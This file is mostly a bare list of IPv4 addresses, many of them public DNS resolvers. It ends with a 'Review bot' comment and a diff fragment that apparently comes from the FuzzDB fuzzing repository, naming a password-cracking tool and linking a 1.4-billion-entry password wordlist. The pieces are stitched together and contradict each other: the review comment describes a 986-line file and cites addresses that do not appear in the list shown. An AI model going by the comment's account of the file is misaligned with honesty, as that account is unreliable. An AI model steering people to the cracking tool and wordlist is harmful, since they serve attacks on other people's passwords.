200.221.137.47
200.35.174.126
200.40.230.36
200.49.160.31
200.49.160.35
200.53.250.1
200.56.224.11
200.57.2.108
200.57.7.61
200.69.193.2
200.85.0.105
200.85.35.158
200.85.61.90
200.88.127.22
200.88.127.23
200.95.144.3
201.131.4.5
201.131.4.9
202.120.111.3
202.130.97.65
202.130.97.66
202.136.162.11
202.138.120.4
202.138.120.6
202.138.120.87
202.148.202.3
202.148.202.4
202.152.162.66
202.180.160.1
202.181.224.2
202.199.160.206
202.248.20.133
202.248.37.74
202.28.162.1
202.30.143.11
202.38.128.58
202.43.178.244
202.43.178.245
202.44.204.63
202.44.55.193
202.46.1.2
202.51.96.5
202.62.224.2
202.83.20.101
202.83.30.5
202.86.8.100
202.91.8.234
203.109.129.67
203.109.129.68
203.113.11.37
203.115.130.74
203.115.71.66
203.115.81.38
203.119.36.106
203.119.8.106
203.130.2.3
203.133.1.7
203.133.1.8
203.146.237.222
203.146.237.237
203.156.104.21
203.176.144.12
203.176.144.20
203.189.88.10
203.189.88.11
203.189.88.133
203.189.88.148
203.189.88.151
203.189.88.152
203.189.88.154
203.189.88.156
203.189.88.211
203.189.88.212
203.189.88.213
203.189.88.214
203.189.88.54
203.189.89.1
203.189.89.134
203.189.89.15
203.189.89.209
203.189.89.241
203.189.89.36
203.189.89.65
203.193.139.150
203.196.0.6
203.198.7.66
203.2.193.67
203.239.131.1
203.248.252.2
203.250.129.214
203.253.31.1
203.41.44.20
203.63.8.27
203.80.96.10
203.89.226.24
203.89.226.26
203.90.78.65
204.116.57.2
204.117.214.10
204.174.120.45
204.95.160.2
205.134.162.209
205.151.222.250
205.152.6.20
205.171.2.65
205.172.19.193
205.172.19.79
205.236.148.130
205.236.148.131
205.242.187.234
206.124.0.254
206.124.1.254
206.124.64.1
206.124.64.253
206.248.95.194
206.253.194.65
206.253.33.130
206.253.33.131
206.51.143.55
206.80.254.4
206.80.254.68
207.17.190.5
207.17.190.7
207.179.3.25
207.241.160.34
207.248.224.71
207.248.224.72
207.248.57.10
207.249.163.155
207.91.130.4
207.91.250.34
208.116.30.21
208.38.1.15
208.48.253.106
208.59.89.20
208.67.220.220
208.67.220.222
208.67.222.220
208.67.222.222
208.72.120.204
208.78.24.238
208.79.56.204
208.90.237.9
209.0.205.11
209.143.0.10
209.143.22.182
209.172.128.2
209.191.129.65
209.195.95.95
209.197.128.2
209.213.223.18
209.216.160.131
209.216.160.2
209.252.33.101
209.51.161.14
209.51.161.58
209.55.0.110
209.55.1.220
209.63.0.18
209.87.64.70
209.87.79.232
210.180.98.69
210.220.163.82
210.2.4.8
210.29.96.33
210.34.0.18
210.34.48.34
210.44.112.66
210.80.58.3
210.80.58.66
210.94.0.7
211.115.194.2
211.115.194.3
211.161.46.84
211.172.208.2
211.175.82.66
211.237.65.21
211.237.65.31
211.41.128.70
211.41.128.71
211.60.155.5
211.63.64.11
211.67.112.1
211.78.130.10
211.78.130.11
211.78.130.3
212.102.225.2
212.110.122.132
212.1.118.3
212.112.39.22
212.112.39.25
212.116.76.76
212.118.0.2
212.118.241.1
212.118.241.33
212.122.224.10
212.14.253.242
212.15.86.12
212.181.124.8
212.19.149.226
212.192.128.3
212.19.96.2
212.203.32.11
212.203.33.12
212.211.132.4
212.214.229.170
212.216.172.222
212.230.255.1
212.230.255.129
212.236.250.4
212.245.158.66
212.26.6.11
212.28.34.90
212.30.96.211
212.31.253.69
212.31.32.130
212.31.32.131
212.34.194.211
212.36.24.3
212.37.208.3
212.40.0.10
212.40.5.50
212.40.5.51
212.49.128.65
212.51.16.1
212.51.17.1
212.54.160.7
212.57.190.166
212.58.3.2
212.58.3.7
212.58.3.8
212.59.199.2
212.59.199.6
212.62.98.10
212.66.0.1
212.66.1.1
212.66.129.98
212.66.160.2
212.67.131.4
212.73.209.34
212.73.65.40
212.82.225.7
212.82.226.212
212.85.112.32
212.85.32.3
212.89.130.180
212.9.160.1
212.94.162.33
212.94.32.32
212.94.34.34
212.96.1.70
212.97.32.2
212.98.160.50
212.98.160.65
213.0.76.5
213.0.77.5
213.0.77.8
213.115.244.69
213.128.194.2
213.131.178.10
213.135.67.1
213.151.109.1
213.157.0.194
213.157.196.130
213.157.196.131
213.157.196.132
213.158.72.1
213.16.104.61
213.164.38.66
213.171.220.209
213.172.33.34
213.178.66.2
213.184.242.6
213.211.50.1
213.211.50.2
213.218.117.85
213.234.128.211
213.235.248.228
213.239.204.35
213.241.193.250
213.244.72.31
213.27.209.53
213.27.209.8
213.55.96.166
213.8.145.133
213.88.195.146
213.88.195.147
213.88.195.148
216.106.1.2
216.106.184.6
216.131.94.5
216.131.95.20
216.136.95.2
216.138.119.6
216.146.35.230
216.147.131.33
216.17.128.1
216.17.128.2
216.175.203.51
216.181.31.11
216.184.96.4
216.184.96.5
216.184.96.6
216.185.64.6
216.186.27.15
216.194.28.33
216.198.139.68
216.21.128.22
216.21.129.22
216.218.221.6
216.218.226.238
216.235.1.3
216.237.221.42
216.244.192.3
216.244.192.32
216.254.141.13
216.254.141.2
216.254.95.2
216.27.175.2
216.47.160.12
216.47.160.13
216.52.126.1
216.52.129.1
216.52.161.33
216.52.169.1
216.52.190.33
216.52.254.1
216.52.254.33
216.52.41.1
216.52.41.33
216.52.65.1
216.52.65.33
216.52.94.1
216.52.94.33
216.52.97.33
216.54.201.11
216.58.97.20
216.58.97.21
216.66.22.2
216.66.38.58
216.66.80.26
216.66.80.30
216.66.80.98
216.81.128.132
216.81.96.67
216.81.96.68
217.107.10.254
217.107.11.35
217.113.48.1
217.115.16.2
217.115.16.3
217.117.0.38
217.117.111.1
217.144.144.211
217.144.6.6
217.148.0.17
217.149.155.180
217.149.17.1
217.15.17.2
217.156.106.1
217.173.198.3
217.17.34.68
217.174.252.116
217.18.206.12
217.18.206.22
217.18.80.105
217.18.90.105
217.196.1.5
217.196.1.6
217.219.236.8
217.22.209.254
217.24.112.2
217.27.240.20
217.28.113.13
217.28.98.62
217.31.204.130
217.32.105.66
217.64.163.1
217.64.167.1
217.65.192.1
217.66.226.8
217.69.160.18
217.69.169.25
217.72.1.2
217.72.168.34
217.73.17.110
217.76.240.2
217.78.80.70
217.78.80.74
217.79.225.8
217.8.180.98
218.102.23.228
218.192.240.2
218.223.32.1
218.232.110.36
218.232.110.37
219.250.36.130
219.252.2.100
220.128.173.228
220.227.60.12
220.233.0.1
221.139.13.130
24.154.1.4
24.154.1.5
35.8.2.41
35.8.2.42
35.8.2.45
35.8.98.43
37.19.5.135
37.235.1.174
37.235.1.177
42.62.176.30
4.79.132.219
50.21.174.18
58.68.121.230
58.96.3.34
61.19.252.238
61.208.115.242
61.56.211.185
61.63.0.66
61.70.87.96
62.105.17.252
62.108.161.161
62.109.182.2
62.116.30.200
62.128.1.42
62.128.1.53
62.129.252.215
62.129.252.252
62.134.11.4
62.140.239.1
62.141.38.230
62.149.128.2
62.165.32.250
62.165.33.250
62.168.59.67
62.177.42.174
62.196.2.70
62.20.15.234
62.20.57.226
62.231.76.49
62.233.128.17
62.24.228.202
62.33.203.33
62.3.32.16
62.3.32.17
62.36.225.150
62.37.225.56
62.37.225.57
62.37.228.20
62.40.32.34
62.76.76.62
62.77.85.100
62.77.85.98
62.77.94.72
62.8.96.38
62.94.0.41
62.94.0.42
62.95.15.107
62.97.84.4
63.105.204.164
63.171.232.38
63.171.232.39
63.218.44.186
63.251.129.33
63.251.161.1
63.251.161.33
63.251.62.1
63.251.62.33
64.105.163.106
64.105.172.26
64.105.179.138
64.105.189.26
64.105.199.74
64.105.199.76
64.105.202.138
64.105.97.90
64.119.60.5
64.119.60.9
64.13.115.12
64.132.61.131
64.132.94.250
64.13.48.12
64.135.1.20
64.135.1.22
64.254.99.13
64.56.129.2
64.61.99.2
64.79.224.3
64.81.127.2
64.81.159.2
64.94.1.1
64.94.1.33
64.94.33.33
65.163.107.11
65.203.109.2
65.39.139.53
65.74.130.5
65.74.130.6
66.118.80.4
66.119.93.10
66.119.93.4
66.163.0.161
66.163.0.173
66.165.177.69
66.165.183.87
66.182.208.5
66.203.72.10
66.207.160.111
66.216.18.222
66.218.245.13
66.218.44.5
66.232.139.10
66.252.170.3
66.28.0.45
66.28.0.61
66.51.206.100
66.80.130.18
66.81.0.252
66.92.159.2
66.92.224.2
66.92.64.2
66.93.87.2
67.100.88.27
67.214.64.6
68.179.203.94
69.146.17.3
69.16.169.11
69.16.170.11
69.24.112.11
69.25.1.1
69.25.1.33
69.26.129.2
69.28.104.5
69.28.136.102
69.28.148.102
69.28.97.4
69.54.70.15
69.67.97.18
69.7.192.1
69.7.192.2
70.36.0.5
70.36.0.6
72.11.150.10
72.11.150.74
72.52.104.74
74.222.30.2
74.82.46.6
75.94.255.12
76.73.18.50
77.240.144.164
77.241.112.23
77.247.176.114
77.41.229.2
77.72.192.3
77.73.104.3
77.87.152.9
77.88.8.1
77.88.8.2
77.88.8.8
77.88.8.88
78.159.224.224
78.159.232.232
78.31.96.2
79.132.192.2
79.141.81.250
79.141.82.250
79.141.83.250
80.149.86.20
80.254.79.157
80.67.169.12
80.72.146.2
80.73.1.1
80.74.160.11
80.79.179.2
80.84.72.20
80.88.171.16
80.92.178.98
80.94.48.254
81.17.66.14
81.17.72.70
81.180.201.98
81.18.242.100
81.189.212.129
81.18.97.50
81.200.80.11
81.222.80.2
81.23.144.250
81.24.128.146
81.25.152.2
81.27.133.50
81.27.135.50
81.28.128.34
8.15.12.5
81.7.200.80
81.92.96.22
81.92.97.12
81.95.128.218
82.115.163.2
82.141.136.2
82.144.181.1
82.145.160.140
82.145.163.1
82.151.90.1
82.198.129.138
82.199.32.36
82.212.67.100
82.212.67.101
82.96.65.2
82.96.81.10
82.96.86.20
82.99.211.195
83.137.41.8
83.137.41.9
83.142.192.2
83.142.9.30
83.143.12.246
83.143.8.220
83.149.244.194
83.151.112.193
83.166.8.18
83.240.154.200
83.242.140.10
83.97.97.3
84.200.69.80
84.200.70.40
84.8.2.11
85.114.105.3
85.115.224.18
85.119.136.158
85.119.72.2
85.124.252.33
85.132.32.41
85.132.32.42
85.158.50.50
85.174.190.2
8.5.244.5
85.88.19.10
85.88.19.11
87.103.133.167
87.104.254.135
87.104.254.39
87.197.40.58
87.204.12.130
87.204.28.12
87.229.99.1
88.147.158.1
88.255.242.6
88.255.96.196
8.8.4.4
88.82.84.129
8.8.8.8
89.107.129.15
89.107.16.2
89.185.75.244
89.186.66.6
89.186.66.7
89.233.250.137
89.249.224.1
90.189.109.2
91.143.20.6
91.144.248.227
91.185.2.10
91.185.6.10
91.188.0.35
91.188.0.5
91.194.112.10
91.197.164.11
91.198.154.133
91.199.139.1
91.203.177.4
91.203.188.1
91.207.40.2
91.210.24.22
91.211.16.6
91.212.56.5
91.214.72.33
91.214.72.34
91.98.128.112
92.43.224.1
93.157.14.65
93.157.233.3
93.188.152.3
94.247.200.2
94.247.200.3
95.158.128.2
95.158.129.2
95.173.193.3
95.85.9.86
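
Review bot: This 986-line file of IPv4 addresses arrives with no header, source or collection date, and nothing on the page says what the addresses are or how they were selected. Lists of this kind go stale quickly; add a README entry naming the source, the date and the intended use. The order is also neither numeric nor strictly lexical (`12.127.16.67` sits between `121.194.2.2` and `121.52.206.130`, and `1.2.4.8` follows `124.107.135.126`), so sort it one way or the other to keep future diffs reviewable.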

@ -31,4 +31,6 @@ http://www.openwall.com/john/
lcp - free l0phtcrack replacement lcp - free l0phtcrack replacement
http://www.lcpsoft.com/english/download.htm http://www.lcpsoft.com/english/download.htm
1.4 billion password wordlist (4gb+, too big to include in FuzzDB)
https://gist.github.com/scottlinux/9a3b11257ac575e4f71de811322ce6b3